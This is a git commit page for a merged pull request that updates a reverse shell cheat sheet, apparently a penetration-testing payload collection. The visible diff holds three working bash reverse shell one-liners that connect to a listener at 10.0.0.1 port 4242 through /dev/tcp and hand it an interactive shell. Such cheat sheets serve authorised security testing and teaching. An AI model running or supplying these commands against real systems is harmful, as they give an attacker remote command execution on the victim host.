Merge pull request #348 from pswalia2u/patch-1

Update Reverse Shell Cheatsheet.md
This commit is contained in:
Swissky 2021-04-26 10:05:59 +02:00 committed by GitHub
commit 1592756f9c
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -46,6 +46,8 @@
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1
```
### Bash UDP